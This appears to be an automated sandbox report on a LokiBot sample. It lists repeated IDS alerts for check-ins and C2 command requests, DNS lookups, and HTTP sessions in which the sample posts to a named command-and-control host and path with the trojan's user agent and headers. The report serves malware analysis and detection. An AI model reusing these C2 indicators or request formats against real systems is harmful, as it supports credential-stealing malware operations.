                                11/22/21-15:35:18.210309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023280192.168.11.20192.185.217.246
                                11/22/21-15:35:18.210309TCP2025381ET TROJAN LokiBot Checkin5023280192.168.11.20192.185.217.246
                                11/22/21-15:35:18.210309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023280192.168.11.20192.185.217.246
                                11/22/21-15:35:19.046559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023380192.168.11.20192.185.217.246
                                11/22/21-15:35:19.046559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023380192.168.11.20192.185.217.246
                                11/22/21-15:35:19.046559TCP2025381ET TROJAN LokiBot Checkin5023380192.168.11.20192.185.217.246
                                11/22/21-15:35:19.046559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023380192.168.11.20192.185.217.246
                                11/22/21-15:35:19.904432TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023480192.168.11.20192.185.217.246
                                11/22/21-15:35:19.904432TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023480192.168.11.20192.185.217.246
                                11/22/21-15:35:19.904432TCP2025381ET TROJAN LokiBot Checkin5023480192.168.11.20192.185.217.246
                                11/22/21-15:35:19.904432TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023480192.168.11.20192.185.217.246
                                11/22/21-15:35:20.763702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023580192.168.11.20192.185.217.246
                                11/22/21-15:35:20.763702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023580192.168.11.20192.185.217.246
                                11/22/21-15:35:20.763702TCP2025381ET TROJAN LokiBot Checkin5023580192.168.11.20192.185.217.246
                                11/22/21-15:35:20.763702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023580192.168.11.20192.185.217.246
                                11/22/21-15:35:21.572750TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023680192.168.11.20192.185.217.246
                                11/22/21-15:35:21.572750TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023680192.168.11.20192.185.217.246
                                11/22/21-15:35:21.572750TCP2025381ET TROJAN LokiBot Checkin5023680192.168.11.20192.185.217.246
                                11/22/21-15:35:21.572750TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023680192.168.11.20192.185.217.246
                                11/22/21-15:35:22.311274TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023780192.168.11.20192.185.217.246
                                11/22/21-15:35:22.311274TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023780192.168.11.20192.185.217.246
                                11/22/21-15:35:22.311274TCP2025381ET TROJAN LokiBot Checkin5023780192.168.11.20192.185.217.246
                                11/22/21-15:35:22.311274TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023780192.168.11.20192.185.217.246
                                11/22/21-15:35:23.160500TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023880192.168.11.20192.185.217.246
                                11/22/21-15:35:23.160500TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023880192.168.11.20192.185.217.246
                                11/22/21-15:35:23.160500TCP2025381ET TROJAN LokiBot Checkin5023880192.168.11.20192.185.217.246
                                11/22/21-15:35:23.160500TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023880192.168.11.20192.185.217.246
                                11/22/21-15:35:23.983829TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023980192.168.11.20192.185.217.246
                                11/22/21-15:35:23.983829TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023980192.168.11.20192.185.217.246
                                11/22/21-15:35:23.983829TCP2025381ET TROJAN LokiBot Checkin5023980192.168.11.20192.185.217.246
                                11/22/21-15:35:23.983829TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023980192.168.11.20192.185.217.246
                                11/22/21-15:35:24.772645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024080192.168.11.20192.185.217.246
                                11/22/21-15:35:24.772645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024080192.168.11.20192.185.217.246
                                11/22/21-15:35:24.772645TCP2025381ET TROJAN LokiBot Checkin5024080192.168.11.20192.185.217.246
                                11/22/21-15:35:24.772645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024080192.168.11.20192.185.217.246
                                11/22/21-15:35:25.618438TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024180192.168.11.20192.185.217.246
                                11/22/21-15:35:25.618438TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024180192.168.11.20192.185.217.246
                                11/22/21-15:35:25.618438TCP2025381ET TROJAN LokiBot Checkin5024180192.168.11.20192.185.217.246
                                11/22/21-15:35:25.618438TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024180192.168.11.20192.185.217.246
                                11/22/21-15:35:26.515056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024280192.168.11.20192.185.217.246
                                11/22/21-15:35:26.515056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024280192.168.11.20192.185.217.246
                                11/22/21-15:35:26.515056TCP2025381ET TROJAN LokiBot Checkin5024280192.168.11.20192.185.217.246
                                11/22/21-15:35:26.515056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024280192.168.11.20192.185.217.246
                                11/22/21-15:35:27.319575TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024380192.168.11.20192.185.217.246
                                11/22/21-15:35:27.319575TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024380192.168.11.20192.185.217.246
                                11/22/21-15:35:27.319575TCP2025381ET TROJAN LokiBot Checkin5024380192.168.11.20192.185.217.246
                                11/22/21-15:35:27.319575TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024380192.168.11.20192.185.217.246
                                11/22/21-15:35:28.157022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024480192.168.11.20192.185.217.246
                                11/22/21-15:35:28.157022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024480192.168.11.20192.185.217.246
                                11/22/21-15:35:28.157022TCP2025381ET TROJAN LokiBot Checkin5024480192.168.11.20192.185.217.246
                                11/22/21-15:35:28.157022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024480192.168.11.20192.185.217.246
                                11/22/21-15:35:28.946258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024580192.168.11.20192.185.217.246
                                11/22/21-15:35:28.946258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024580192.168.11.20192.185.217.246
                                11/22/21-15:35:28.946258TCP2025381ET TROJAN LokiBot Checkin5024580192.168.11.20192.185.217.246
                                11/22/21-15:35:28.946258TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024580192.168.11.20192.185.217.246
                                11/22/21-15:35:29.845433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024680192.168.11.20192.185.217.246
                                11/22/21-15:35:29.845433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024680192.168.11.20192.185.217.246
                                11/22/21-15:35:29.845433TCP2025381ET TROJAN LokiBot Checkin5024680192.168.11.20192.185.217.246
                                11/22/21-15:35:29.845433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024680192.168.11.20192.185.217.246
                                11/22/21-15:35:30.601769TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024780192.168.11.20192.185.217.246
                                11/22/21-15:35:30.601769TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024780192.168.11.20192.185.217.246
                                11/22/21-15:35:30.601769TCP2025381ET TROJAN LokiBot Checkin5024780192.168.11.20192.185.217.246
                                11/22/21-15:35:30.601769TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024780192.168.11.20192.185.217.246
                                11/22/21-15:35:31.401409TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024880192.168.11.20192.185.217.246
                                11/22/21-15:35:31.401409TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024880192.168.11.20192.185.217.246
                                11/22/21-15:35:31.401409TCP2025381ET TROJAN LokiBot Checkin5024880192.168.11.20192.185.217.246
                                11/22/21-15:35:31.401409TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024880192.168.11.20192.185.217.246
                                11/22/21-15:35:32.222297TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024980192.168.11.20192.185.217.246
                                11/22/21-15:35:32.222297TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024980192.168.11.20192.185.217.246
                                11/22/21-15:35:32.222297TCP2025381ET TROJAN LokiBot Checkin5024980192.168.11.20192.185.217.246
                                11/22/21-15:35:32.222297TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024980192.168.11.20192.185.217.246
                                11/22/21-15:35:33.027293TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025080192.168.11.20192.185.217.246
                                11/22/21-15:35:33.027293TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025080192.168.11.20192.185.217.246
                                11/22/21-15:35:33.027293TCP2025381ET TROJAN LokiBot Checkin5025080192.168.11.20192.185.217.246
                                11/22/21-15:35:33.027293TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025080192.168.11.20192.185.217.246
                                11/22/21-15:35:33.875221TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025180192.168.11.20192.185.217.246
                                11/22/21-15:35:33.875221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025180192.168.11.20192.185.217.246
                                11/22/21-15:35:33.875221TCP2025381ET TROJAN LokiBot Checkin5025180192.168.11.20192.185.217.246
                                11/22/21-15:35:33.875221TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025180192.168.11.20192.185.217.246
                                11/22/21-15:35:34.680892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025280192.168.11.20192.185.217.246
                                11/22/21-15:35:34.680892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025280192.168.11.20192.185.217.246
                                11/22/21-15:35:34.680892TCP2025381ET TROJAN LokiBot Checkin5025280192.168.11.20192.185.217.246
                                11/22/21-15:35:34.680892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025280192.168.11.20192.185.217.246
                                11/22/21-15:35:35.511952TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025380192.168.11.20192.185.217.246
                                11/22/21-15:35:35.511952TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025380192.168.11.20192.185.217.246
                                11/22/21-15:35:35.511952TCP2025381ET TROJAN LokiBot Checkin5025380192.168.11.20192.185.217.246
                                11/22/21-15:35:35.511952TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025380192.168.11.20192.185.217.246
                                11/22/21-15:35:36.323395TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025480192.168.11.20192.185.217.246
                                11/22/21-15:35:36.323395TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025480192.168.11.20192.185.217.246
                                11/22/21-15:35:36.323395TCP2025381ET TROJAN LokiBot Checkin5025480192.168.11.20192.185.217.246
                                11/22/21-15:35:36.323395TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025480192.168.11.20192.185.217.246
                                11/22/21-15:35:37.142483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025580192.168.11.20192.185.217.246
                                11/22/21-15:35:37.142483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025580192.168.11.20192.185.217.246
                                11/22/21-15:35:37.142483TCP2025381ET TROJAN LokiBot Checkin5025580192.168.11.20192.185.217.246
                                11/22/21-15:35:37.142483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025580192.168.11.20192.185.217.246
                                11/22/21-15:35:37.994775TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025680192.168.11.20192.185.217.246
                                11/22/21-15:35:37.994775TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025680192.168.11.20192.185.217.246
                                11/22/21-15:35:37.994775TCP2025381ET TROJAN LokiBot Checkin5025680192.168.11.20192.185.217.246
                                11/22/21-15:35:37.994775TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025680192.168.11.20192.185.217.246
                                11/22/21-15:35:38.758701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025780192.168.11.20192.185.217.246
                                11/22/21-15:35:38.758701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025780192.168.11.20192.185.217.246
                                11/22/21-15:35:38.758701TCP2025381ET TROJAN LokiBot Checkin5025780192.168.11.20192.185.217.246
                                11/22/21-15:35:38.758701TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025780192.168.11.20192.185.217.246
                                11/22/21-15:35:39.603242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025880192.168.11.20192.185.217.246
                                11/22/21-15:35:39.603242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025880192.168.11.20192.185.217.246
                                11/22/21-15:35:39.603242TCP2025381ET TROJAN LokiBot Checkin5025880192.168.11.20192.185.217.246
                                11/22/21-15:35:39.603242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025880192.168.11.20192.185.217.246
                                11/22/21-15:35:40.475305TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025980192.168.11.20192.185.217.246

                                Network Port Distribution

                                TCP Packets


                                UDP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Nov 22, 2021 15:28:57.935935974 CET | 63295 | 53 | 192.168.11.20 | 1.1.1.1
                                Nov 22, 2021 15:28:58.180563927 CET | 53 | 63295 | 1.1.1.1 | 192.168.11.20
                                Nov 22, 2021 15:29:00.404613972 CET | 49870 | 53 | 192.168.11.20 | 1.1.1.1
                                Nov 22, 2021 15:29:00.798486948 CET | 53 | 49870 | 1.1.1.1 | 192.168.11.20

                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Nov 22, 2021 15:28:57.935935974 CET | 192.168.11.20 | 1.1.1.1 | 0x38ce | Standard query (0) | afrocompass.com | A (IP address) | IN (0x0001)
                                Nov 22, 2021 15:29:00.404613972 CET | 192.168.11.20 | 1.1.1.1 | 0xb881 | Standard query (0) | karinedocesesalgados.com.br | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Nov 22, 2021 15:28:58.180563927 CET | 1.1.1.1 | 192.168.11.20 | 0x38ce | No error (0) | afrocompass.com | | 68.66.226.70 | A (IP address) | IN (0x0001)
                                Nov 22, 2021 15:29:00.798486948 CET | 1.1.1.1 | 192.168.11.20 | 0xb881 | No error (0) | karinedocesesalgados.com.br | | 192.185.217.246 | A (IP address) | IN (0x0001)

                                HTTP Request Dependency Graph

                                • afrocompass.com
                                • karinedocesesalgados.com.br

                                HTTP Packets

                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                0 | 192.168.11.20 | 49787 | 68.66.226.70 | 443 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                1 | 192.168.11.20 | 49788 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:00.949976921 CET | 313 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 178
                                Connection: close
                                Nov 22, 2021 15:29:01.265006065 CET | 314 | IN | HTTP/1.1 404 Not Found
                                Date: Mon, 22 Nov 2021 14:29:01 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 15
                                Content-Type: text/html
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                10 | 192.168.11.20 | 49797 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:15.742523909 CET | 328 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:16.046370983 CET | 329 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:15 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                11 | 192.168.11.20 | 49798 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:16.767343998 CET | 329 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:17.064059973 CET | 330 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:16 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                12192.168.11.2049799192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:17.727560997 CET331OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:18.023998976 CET | 331 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:17 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                120 | 192.168.11.20 | 49907 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                121 | 192.168.11.20 | 49908 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                122 | 192.168.11.20 | 49909 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                123 | 192.168.11.20 | 49910 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                124 | 192.168.11.20 | 49911 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                125 | 192.168.11.20 | 49912 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                126 | 192.168.11.20 | 49913 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                127 | 192.168.11.20 | 49914 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                128 | 192.168.11.20 | 49915 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                129 | 192.168.11.20 | 49916 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                13 | 192.168.11.20 | 49800 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:18.707510948 CET | 332 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:19.010202885 CET | 333 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:18 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                130 | 192.168.11.20 | 49917 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                131 | 192.168.11.20 | 49918 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                132 | 192.168.11.20 | 49919 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                133 | 192.168.11.20 | 49920 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                134 | 192.168.11.20 | 49921 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                135 | 192.168.11.20 | 49922 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                136 | 192.168.11.20 | 49923 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                137 | 192.168.11.20 | 49924 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                138 | 192.168.11.20 | 49925 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                139 | 192.168.11.20 | 49926 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                14 | 192.168.11.20 | 49801 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:19.741161108 CET | 333 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:20.064798117 CET | 334 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:19 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                140 | 192.168.11.20 | 49927 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                141 | 192.168.11.20 | 49928 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                142 | 192.168.11.20 | 49929 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                143 | 192.168.11.20 | 49930 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                144 | 192.168.11.20 | 49931 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                145 | 192.168.11.20 | 49932 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                146 | 192.168.11.20 | 49933 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                147 | 192.168.11.20 | 49934 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                148 | 192.168.11.20 | 49935 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                149 | 192.168.11.20 | 49936 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                15 | 192.168.11.20 | 49802 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:20.815320969 CET | 335 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:21.128072023 CET | 335 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:20 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                150 | 192.168.11.20 | 49937 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                151 | 192.168.11.20 | 49938 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                152 | 192.168.11.20 | 49939 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                153 | 192.168.11.20 | 49940 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                154 | 192.168.11.20 | 49941 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                155 | 192.168.11.20 | 49942 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                156 | 192.168.11.20 | 49943 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                157 | 192.168.11.20 | 49944 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                158 | 192.168.11.20 | 49945 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                159 | 192.168.11.20 | 49946 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                16 | 192.168.11.20 | 49803 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:21.862086058 CET | 337 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:22.159688950 CET | 337 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:21 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                160 | 192.168.11.20 | 49947 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                161 | 192.168.11.20 | 49948 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                162 | 192.168.11.20 | 49949 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                163 | 192.168.11.20 | 49950 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                164 | 192.168.11.20 | 49951 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                165 | 192.168.11.20 | 49952 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                166 | 192.168.11.20 | 49953 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                167 | 192.168.11.20 | 49954 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                168 | 192.168.11.20 | 49955 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                169 | 192.168.11.20 | 49956 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                17 | 192.168.11.20 | 49804 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:22.752104044 CET | 338 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
